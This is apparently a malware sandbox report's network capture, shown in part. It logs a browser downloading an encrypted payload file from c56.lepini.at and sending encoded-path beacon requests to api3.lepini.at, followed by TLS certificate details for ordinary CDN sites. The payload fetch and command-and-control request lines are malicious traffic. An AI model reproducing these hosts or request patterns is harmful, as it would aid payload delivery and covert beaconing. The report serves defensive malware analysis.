f8 9e 05 c0 5a 81 8e 5f a3 ff 42 38 c4 15 8e f4 c5 f4 84 12 a3 0f ae 1c 79 5f 55 04 71 ab 16 86 04 b5 26 45 c1 1e f1 0c d3 6d 93 da 34 92 07 29 0f 7d f3 b1 f0 42 0c 74 23 e1 07 09 aa 17 e3 3a 76 23 0c 27 41 95 44 1b cc c0 6c b1 67 1c 49 a3 fd 27 48 25 64 b9 21 aa 4b a5 07 b1 fe ca 41 9c 84 f4 bd 6d 51 c8 04 17 f0 51 73 39 51 2e 39 77 0f 2b f9 78 55 85 fe 06 3a 57 c8 b2 aa 51 1a bf b1 b6 f5 9c 21 0b fe 10 47 5d 37 d1 ca a3 c0 65 27 b8 4c 75 4f d1 c8 ac f3 9c 92 f6 09 86 93 59 48 bc 93 36 32 ab 8a de 24 16 3a fa cb 81 c4 5f 96 b7 ed f2 18 89 8f d0 9a 35 54 d6 57 2c 56 60 5c 98 bf 0e 12 af d4 7d 88 2e 5b 63 f9 c6 20 c6 93 Data Ascii: 76c5CD[3I$wI0_TvfWmO]E>-xw4gQcg~5ira{duSNN&Zn\|:Unj>==M6,k5g2pb8z6R$PG6[1o@-AAOke%q <<fGG[oM/]vIl+]auJsrutOb'crtP^0sMj)cRGu]{c),AH"85hs\|B Su#)xlyP.2]Y2Q;,wVK=V48Uun6bDFXWsMC.j8g1L ^rs/.REyM0JayC$C\|+"BM":6)e+d~(nT2lehnF<@+j\mGa\|%\+op-BCDre[FB,`h%f.^%%;$QWCb:xdiLzlMm?5Q3N@Z];Z_B8y_Uq&Em4)}Bt#:v#'ADlgI'H%d!KAmQQs9Q.9w+xU:WQ!G]7e'LuOYH62$:_5TW,V`\}.[c
Feb 15, 2021 21:26:50.666857004 CET	3667	IN	Data Raw: e3 c3 40 bf b9 61 2d 05 15 84 20 14 ed 60 e3 f9 0c c8 a7 1c ac 63 51 f6 46 c8 6a fa 4f 8d 28 bb cf 99 6c 9e 2f 09 cf c4 a1 07 76 73 4b f1 ad 46 da 73 bb bb 31 e9 e2 b3 5c 19 7c 62 1c c0 fd a2 b7 4f 63 20 d5 57 ab 6b 1a 92 3a 8a 20 74 8c 9f e8 94 Data Ascii: @a- `cQFjO(l/vsKFs1\\|bOc Wk: tdE((l}-+RJ{;eGaOw)(QTrV=n)1<JJgcmV$(T+",^%EniZBvm*6$^a5

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.5	49772	34.65.144.159	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 15, 2021 21:27:39.873075008 CET	8565	OUT	GET /jvassets/xI/t64.dat HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: c56.lepini.at
Feb 15, 2021 21:27:39.998234034 CET	8567	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 15 Feb 2021 20:27:39 GMT Content-Type: application/octet-stream Content-Length: 138820 Last-Modified: Mon, 28 Oct 2019 09:43:42 GMT Connection: close ETag: "5db6b84e-21e44" Accept-Ranges: bytes Data Raw: 17 45 7e 72 ac 5b ed 66 e1 de 31 9e 70 18 b7 1a 77 c0 be b3 e2 43 ff 7c d8 16 7f 6f 35 a2 d1 a5 d2 ec 0d 0c de 58 84 1a f3 53 04 f0 65 cb 76 1f 35 85 a0 7d 1d f2 44 63 de 89 f3 f1 eb d3 60 21 68 3d 3a 93 e1 55 94 db 4c d2 f2 b4 3e 34 48 eb e8 47 7b 53 14 54 86 87 a3 d2 0d 55 0c d0 4f 6f 51 73 eb e2 f9 f4 9b f0 49 af 3d a0 bd ba 48 52 29 a2 84 33 75 9e 48 16 a7 b3 00 58 91 bf bf ea 49 85 ff c7 58 36 df 5b 13 ec c2 c6 92 56 72 82 53 68 a1 ca a8 33 3e e7 8b 8e 6f fa 4b 85 a0 7f bb 5c de 12 c3 97 40 27 18 f2 b2 95 91 d8 b7 45 cf 2a 5f 95 76 5b fc 02 c1 9d d7 e5 7f ee ec f5 a0 52 7b 4d 4d ae da 70 b4 71 95 b6 39 2e 38 47 c0 ab 5e fe cf a1 6a 5c a5 3c 8f 1b 97 0a 2a 41 5f 6e 2e 85 b4 8e 24 d6 6a 1c cb 43 8c ca 75 7d 09 57 73 3c a2 b8 0b 18 00 21 c1 f5 fc e4 2b 04 14 51 c3 36 ea 80 55 0a 28 82 e4 56 51 91 99 bf 11 ae 36 06 cd 81 44 e0 ad db 69 d6 8e 24 28 ee 4c 0d 81 69 8b 96 c0 52 cd ed ec 31 e8 7f 08 d8 ff 0a 82 4d 1d fa a0 28 3c 3f 5f 53 cb 64 ea 5d 7c c7 f0 0f 28 71 5a f4 60 b7 7b f3 e1 19 5b 7b be d1 62 af ef 2f ad 3b 22 a8 03 e7 9f 3d e5 da ca 8b 1a 9c 2c fd 76 89 a9 f7 a5 7b 6a b4 47 62 bf 64 5d 54 26 01 9a 1d 3b b0 97 db c5 c1 dd 94 52 d0 b2 77 e0 f7 00 8d c1 99 02 69 f4 b2 87 b2 0c 68 b3 9d b6 e6 a6 9f 58 b0 52 f8 5e b5 ac 1e 36 41 bd bc f9 5d 3a 2b 5a 40 60 9a 48 c1 b3 4a df cc 81 65 53 4e e4 9a 80 8b dd 8f 43 eb 11 23 73 1b 1b c1 99 89 21 94 4c a5 84 c3 13 96 ad 5d 82 20 a4 a4 3b dd 1e 43 74 c6 42 11 7a 8a f2 93 8b 7e 24 73 17 d9 c7 eb 47 18 47 41 4f a2 f1 bc 52 cc 35 f2 c2 73 3e e5 32 8a b5 c7 7c 3b d4 88 bd aa 47 48 66 2e 00 bd 3f fc 08 b4 49 98 e3 36 db f0 33 4c 40 2b cc 59 2a b5 ba 73 58 27 de a0 31 0e 6d 63 70 19 7b 5f 67 00 54 79 89 7f 42 21 df 6e 23 e1 54 43 4a 09 00 77 ac fb e4 2e a8 6d 07 21 b3 a0 98 ad 40 d2 34 64 c9 c2 62 14 7c 45 eb a0 65 98 c1 18 a1 6a af 69 0a a2 bb 50 42 96 c1 d7 02 58 6d f4 b1 15 90 f6 50 9c 6a fd d4 2e 5e a7 4a cb 67 59 63 74 77 99 de e0 c0 d5 5c 9d a7 89 1b 90 39 29 23 21 3b c4 35 f1 49 9e 67 f3 ce fe 1d 0a 67 69 06 13 13 30 ab e6 c6 f4 c9 7e 94 48 5b a1 f7 5f 27 1f 03 ac 85 e1 0e b1 bf 6e e1 1c 5a 24 cc b2 53 fd 61 58 e3 87 0b 85 9e 03 94 f6 2a bd 92 53 09 77 f8 5e d3 c9 b7 19 42 4e e6 2a 67 af 27 4e 01 de 6a fc 1e 82 0c 7e 45 7b e8 1d 97 82 9b 5c 14 96 d2 82 dd 53 15 1e 84 41 01 4f 0f 32 ac ee b7 85 96 4c e9 dc b0 42 3c 93 a6 0b a3 79 cb 7b 2c d1 21 6f c1 6a 38 48 d7 37 8f 35 b8 1d 7a e7 eb 63 bc 4e 6b b6 23 aa 9c fd 32 03 46 e2 37 47 49 c2 35 a1 48 7e 98 49 6a b4 98 e7 cb 33 dd 1a be 5a c8 ea a7 44 33 9b e3 a6 84 da 68 ec bf 93 03 88 f9 6e 02 17 a6 96 46 ad ae 25 c2 bb 97 7a 57 35 aa 0a 42 b5 c3 8a 35 af 20 1b 1a b9 c6 99 99 8a b2 b6 46 1c 70 a0 53 c2 e9 a2 e6 ad a4 8f d5 11 da 74 60 13 7c 55 4d 42 1c c6 a4 47 a8 4e 27 67 a4 37 b3 0e ca f5 b1 9a a5 de e3 07 25 55 07 ff 18 b3 17 44 8b a0 af e3 f5 ff 75 b8 f2 2b 4d 9e f9 ad 07 c0 5e d7 1b ab 81 e4 99 93 ac a9 63 2f 4e 27 18 d0 dd 29 f7 28 98 b1 c3 5e 52 9e d4 01 1b 9f ba 6d 7d 24 b8 cc 84 0e 03 07 2e 3a ba b5 ad 8b ae 57 ce 78 7b aa 0f 07 5f ee 2a 4a 6b 0d f8 40 bb 79 91 71 5d ae 1b 1d 3c bf b9 e2 9b d4 4c 6c 52 55 e3 59 22 40 9a 6f cc 9a 14 bb 63 ad 00 8f bf cd 7b ca 18 ce c6 df 21 08 86 ed 93 17 79 b7 6d 89 0c ba 64 8a 93 dd fa 1b 07 69 84 31 87 f9 ae 59 a4 f8 ed 03 62 6f 2a fa 54 99 38 81 d4 e3 dc e8 39 d4 b0 62 81 c2 49 a1 Data Ascii: E~r[f1pwC\|o5XSev5}Dc`!h=:UL>4HG{STUOoQsI=HR)3uHXIX6[VrSh3>oK\@'E_v[R{MMpq9.8G^j\<A_n.$jCu}Ws<!+Q6U(VQ6Di$(LiR1M(<?_Sd]\|(qZ`{[{b/;"=,v{jGbd]T&;RwihXR^6A]:+Z@`HJeSNC#s!L] ;CtBz~$sGGAOR5s>2\|;GHf.?I63L@+YsX'1mcp{_gTyB!n#TCJw.m!@4db\|EejiPBXmPj.^JgYctw\9)#!;5Iggi0~H[_'nZ$SaXSw^BNg'Nj~E{\SAO2LB<y{,!oj8H75zcNk#2F7GI5H~Ij3ZD3hnF%zW5B5 FpSt`\|UMBGN'g7%UDu+M^c/N')(^Rm}$.:Wx{_Jk@yq]<LlRUY"@oc{!ymdi1Ybo*T89bI
Feb 15, 2021 21:27:39.998258114 CET	8568	IN	Data Raw: eb f5 88 ab ff 3f 0c 75 18 1b 1d 91 15 83 a6 fd 8b ee e5 bd 0f 48 82 1c 3d 58 61 f7 66 26 f2 73 9c 5e a2 cd 4a 40 a8 52 cb 15 b9 9e 3b df e8 48 53 c5 31 f7 99 29 1a aa 5a 45 ff 53 fe d6 ce f8 d1 52 76 db d2 1d 04 1c 72 03 24 24 ea d3 f6 ed 0b a8 Data Ascii: ?uH=Xaf&s^J@R;HS1)ZESRvr$$tfK[78IZJw5nJX($B~"2"LZ YVBR6e?]<3Cb RaG;d6{(1#SVJ8\|ymf&ASxYE6*Vfy
Feb 15, 2021 21:27:39.998275042 CET	8569	IN	Data Raw: 17 e6 e3 36 d0 98 48 92 d6 8c 71 5d 6d 0c b5 89 7b f0 f8 2b 38 6c 87 33 a0 26 18 6c 19 1f b4 dd 6d a8 59 82 27 0f f4 73 73 5a 2b f2 0d 90 05 8d a8 2e f6 c3 62 40 2a 1e 51 7b e4 87 c8 26 68 a9 73 36 f0 f9 2e 79 3b b2 24 df 00 53 a1 ef 92 9a 6c d1 Data Ascii: 6Hq]m{+8l3&lmY'ssZ+.b@*Q{&hs6.y;$SlTNI#1<:'vKS;<x{vYJ0y4oO6,)\|S}P{ZL)%;eG`>yBTpCq`^7BW@O5Y-xkB6L=}
Feb 15, 2021 21:27:39.998291016 CET	8571	IN	Data Raw: e3 dd 38 4b 8e 73 21 eb 8f 06 22 3f 26 6d fe dd 16 d9 84 d9 6d 75 bd aa 6a 7a c4 48 d5 a0 29 cf 64 c2 d0 8a e9 59 26 44 95 5e c8 f4 ee 3e 75 fa f2 90 83 4f b0 03 03 da 2b a5 bf 28 4d 6a 66 36 57 4e 20 38 25 31 09 83 27 80 93 bc 6d ab 43 d9 f3 23 Data Ascii: 8Ks!"?&mmujzH)dY&D^>uO+(Mjf6WN 8%1'mC#U(SLNqv#<[Nf@"Cs \<v=*e7>mh-k\=2@NCzQ"45_sqd,g}]XdQ4TG:`phV-:t=(
Feb 15, 2021 21:27:39.998306990 CET	8572	IN	Data Raw: 96 b4 a8 52 0a 3c cc 5a a8 f6 3d 04 3b 66 9c 68 c0 67 fe ae 92 b8 bb a4 47 48 ec 76 69 69 fe ef 78 5d c3 36 e3 20 41 a3 97 30 c7 15 95 e7 56 6a 89 1f c9 09 d7 97 64 b5 c3 71 95 4b 7f 59 46 03 01 7a 66 6f ae 00 3b 4b e1 d6 3a 1b dd 21 33 78 24 d4 Data Ascii: R<Z=;fhgGHviix]6 A0VjdqKYFzfo;K:!3x$ [OVi<dnDPVv>?(UVnR)$K\,7/@sW+ue(EDe*[Mz{Uial'er^r
Feb 15, 2021 21:27:39.998322964 CET	8573	IN	Data Raw: 8d ca df 11 4f fc 21 25 23 28 d3 8c 54 2b e3 24 ac d8 5f f6 d7 0b 62 74 a2 8c 3a 67 20 ba 28 47 5a 5a 33 e8 16 02 dc 03 3f 52 a8 c0 8d 10 e2 05 5b 66 18 c7 ed 24 1e 6b c5 34 e1 94 1d 95 1d b6 33 62 b1 4f 49 9e 51 82 f1 4f 44 09 41 39 a8 3b 77 63 Data Ascii: O!%#(T+$_bt:g (GZZ3?R[f$k43bOIQODA9;wcHSpd7cQ5@'UFi!S$Z&lcFa<(: #vP\|@!cPkn6A{!dQ${Z+1Q&=HL:Ny21W
Feb 15, 2021 21:27:39.998339891 CET	8575	IN	Data Raw: 09 2f f0 20 e4 26 5b cb d4 cc e5 52 cf db 61 6b 2d 47 ec 69 dd 5e 31 72 29 9d d5 ac fa 55 ae 1b 0d 3c dc 64 67 32 b2 a3 85 c1 e3 48 e0 86 49 8c 9b 60 74 e9 51 c1 19 c6 2b 6d f5 4a 64 2e 07 6a 5e 53 1f 1f 3b ed 0a 0b ce 79 2f 2f 0e 2d 7a c0 6e e1 Data Ascii: / &[Rak-Gi^1r)U<dg2HI`tQ+mJd.j^S;y//-zn5.XR+_6}p{U[%(:]'F9~1me$QaV$;@F/Bs7EO@m+hb0I2qWje6'
Feb 15, 2021 21:27:39.998356104 CET	8576	IN	Data Raw: 7a a1 92 c2 66 9c fa 7f 43 4f 25 10 46 b1 e3 4e ee 61 73 a5 d5 db 2e dd 5d a0 6d f0 3a 12 00 0d a1 64 a0 22 6e ab 5f a2 db 1e f6 88 12 b9 8b 06 29 43 bf a4 21 7e ad 39 3f 44 c0 00 28 bf d4 9c bb 13 10 82 96 aa df 27 b6 2f a2 1d d4 73 54 39 ee 77 Data Ascii: zfCO%FNas.]m:d"n_)C!~9?D('/sT9wQ+V(FIA}DxQ8tl5m[Zo(82]UD0yoSv\:^E'f)kHuX#_.)Yg-FzNZVt?YI{sVL
Feb 15, 2021 21:27:39.998374939 CET	8578	IN	Data Raw: 5e 50 5f 4c e5 c6 31 9a 88 82 ec 6c d8 60 3e fa 75 dd 91 ad 70 ca dc 5f 9b 60 14 dd a7 fe b2 d7 4f f1 c4 60 d2 be 52 f7 0a f8 06 bd 43 ac 27 32 e1 2a b7 25 05 15 9c d6 09 5b 54 6a ae d6 30 23 2a bc ef 40 c4 c3 4a d9 ed 04 7c 6f 42 02 12 cb 05 ed Data Ascii: ^P_L1l`>up_`O`RC'2%[Tj0#@J\|oB+%lZiA-)D}ubR$%5EgDI?'f*=^8[szVr4Y'/4+{D8y^)/}Faf%#Dcn~l;+XmjUgmF}xxKHt
Feb 15, 2021 21:27:39.998394012 CET	8579	IN	Data Raw: 4e 72 9b e7 16 b5 db c8 44 a9 f7 b1 71 65 64 64 60 b1 da 0c 16 8f b8 53 d1 a2 07 c4 2c ce 07 d0 55 a2 ac 93 0a 01 aa a8 21 23 e3 97 b6 bf 91 60 da ad 15 09 b0 d1 eb 48 cd ad 94 47 28 8e bb 58 9a 48 f3 6e 83 e2 8d 01 e1 e8 5f d9 1f 69 c7 21 42 59 Data Ascii: NrDqedd`S,U!#`HG(XHn_i!BY"Rb#Y27)7P="wntU_ ?y]&L=g%Ax} Cr'nv\|&g6wHLTk?N~d>,<AHkPyhv?R
Feb 15, 2021 21:27:40.044647932 CET	8580	IN	Data Raw: 93 85 14 68 47 26 7c 67 39 3f 77 88 de d4 5c 18 30 d0 14 5e de 9a 6b e5 2c 48 b0 5e 3d e3 91 af 57 bc 3d 16 94 7d 2f 2b 88 f1 7d 3b eb e7 ad 0a 9a b3 3e 5a 07 af 45 8e 04 22 7d a2 2c 36 e1 36 62 6f d9 1c 0a bb 93 98 d7 d2 b7 80 73 e6 03 40 9d 41 Data Ascii: hG&\|g9?w\0^k,H^=W=}/+};>ZE"},66bos@AP>}U$2JgNc0eWm\|b^t]}_cI>RUM\B=6mLU#H_*tfx4l?cCFI="4<[@HErLp

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.5	49773	34.65.144.159	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 15, 2021 21:27:49.780139923 CET	8784	OUT	GET /api1/7SpKvNZQZWoR0wQKCmN1/KD_2BPey7M6A4sknzph/Ip3VpPOQqmnCvT_2B_2BK5/4r2K_2B3wW0f3/JdFGceR8/sN9tQwx3x3JWJ2dzvoaA_2F/7bnKlxAsYe/gSbjUWPJM3O0NeIou/EZHWrqNzUS0t/SJ53k6qr4k5/xiOJ1_2BbyKtK4/Tnf2QRNkKddPRNN_2Fkyp/65kWXGWip9M43opO/J4Nq71H0yPbyFLs/r9xzWAiWquka5b9cWG/7jyYbvLwX/YHG6XBsznTAJKxK3VHeE/SrFheeplHdah6LyL5hX/KC_2BG8oiks28NBuCaE6gf/tQuPh0 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 Host: api3.lepini.at
Feb 15, 2021 21:27:50.445771933 CET	8784	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 15 Feb 2021 20:27:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.5	49774	34.65.144.159	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 15, 2021 21:27:50.736696959 CET	8789	OUT	POST /api1/bXII_2FHb0focJwi2/NKTIw_2FgiKf/ws9atmb5xre/8ghQ36n3SNQg84/1PN9WyLcQDb7Ra3wHIhjp/FiUmpJqa00TMQIaH/_2BHj0Q4IM1ltM6/5khUyF_2BRsPcD5Q37/C_2FE9BKN/CafUcW267Vk_2FIY_2Bn/_2BcfZsnCXmPwjFlUTt/pXytrrnaXNmzXOHxla9mOU/6X7At_2B8RTFx/TPw_2FzM/jbcnoszV5Xhd9jlATPIAobN/UMGaXl3YDQ/Krg2ExScIQW_2Fg_2/BTQ5TzTymRNC/sxopWB80XHY/7SN_2FkITnVhH7/8XPMTwHoJBXOcWd_2Fyk4/T_2Bzs HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 Content-Length: 2 Host: api3.lepini.at
Feb 15, 2021 21:27:50.736718893 CET	8789	OUT	Data Raw: 0d 0a Data Ascii:
Feb 15, 2021 21:27:51.290230989 CET	8791	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 15 Feb 2021 20:27:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 37 37 0d 0a 8d 87 1d d8 f1 f6 56 18 d6 06 ac 96 e6 02 31 13 0c 4c 71 ae 76 5d 86 ad 65 61 3c 10 dd e4 a2 09 e8 e8 bc ba 5b 50 c0 53 3b 32 2b 69 39 b6 10 2a 09 d4 23 26 4d 48 07 7a d8 78 b7 5d 11 11 d6 52 f5 cc 40 24 2d 87 fe a1 d1 2a 1c d3 73 99 b2 06 b5 11 54 b0 56 46 db 3b 41 13 c7 6c ee 0c e3 85 02 bc c6 a6 c0 3d 1e e0 07 79 99 ab a6 cf 5e 3f 26 d2 73 9f 87 0d 0e 0d 0a 30 0d 0a 0d 0a Data Ascii: 77V1Lqv]ea<[PS;2+i9#&MHzx]R@$-sTVF;Al=y^?&s0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.5	49775	34.65.144.159	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 15, 2021 21:27:51.945363045 CET	8792	OUT	GET /api1/AV8RjqvumRQ/OvLh7PdTNMKGa7/3LP4_2BG3LRcoZojWSk5u/NsORJjPn_2Fv_2B1/6Rz2NQs3_2FAyK6/XQQdYcU_2Fse_2F2j3/Zr9Hx_2Ba/98olXIGwinJCl_2FG4zm/M7DRWkrkSQ3KxF_2B9c/y19JwEmq4VBfpQCfptESLl/3GITd_2BqQxr2/SZAx9P1V/YikBhoAaQcpPJtcNJcJIY1_/2BjEuQfwCu/DUjEswX2uyguNEfAU/ZGf5P4bm4kOR/ZxxrQAreiF2/UPHWjC6fJcwkvj/jLEwRcMGH9odoyp8GuEAA/_2BQntTJU4ER5IW5/BN_2BQxL/y8vbI87 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 Host: api3.lepini.at
Feb 15, 2021 21:27:52.335773945 CET	8793	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 15 Feb 2021 20:27:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Feb 15, 2021 21:26:09.842351913 CET	104.20.184.68	443	192.168.2.5	49732	CN=onetrust.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Fri Feb 12 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Sat Feb 12 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Feb 15, 2021 21:26:09.842351913 CET	104.20.184.68	443	192.168.2.5	49732	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		9e10692f1b7f78228b2d4e424db3a98c
Feb 15, 2021 21:26:09.843595028 CET	104.20.184.68	443	192.168.2.5	49733	CN=onetrust.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Fri Feb 12 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Sat Feb 12 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Feb 15, 2021 21:26:09.843595028 CET	104.20.184.68	443	192.168.2.5	49733	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		9e10692f1b7f78228b2d4e424db3a98c
Feb 15, 2021 21:26:16.632045031 CET	151.101.1.44	443	192.168.2.5	49749	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Feb 15, 2021 21:26:16.632045031 CET	151.101.1.44	443	192.168.2.5	49749	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Feb 15, 2021 21:26:16.747270107 CET	151.101.1.44	443	192.168.2.5	49747	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Feb 15, 2021 21:26:16.747270107 CET	151.101.1.44	443	192.168.2.5	49747	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Feb 15, 2021 21:26:16.959656000 CET	151.101.1.44	443	192.168.2.5	49751	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Feb 15, 2021 21:26:16.959656000 CET	151.101.1.44	443	192.168.2.5	49751	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Feb 15, 2021 21:26:16.960663080 CET	151.101.1.44	443	192.168.2.5	49746	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Feb 15, 2021 21:26:16.960663080 CET	151.101.1.44	443	192.168.2.5	49746	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Feb 15, 2021 21:26:17.004138947 CET	151.101.1.44	443	192.168.2.5	49748	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Feb 15, 2021 21:26:17.004138947 CET	151.101.1.44	443	192.168.2.5	49748	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
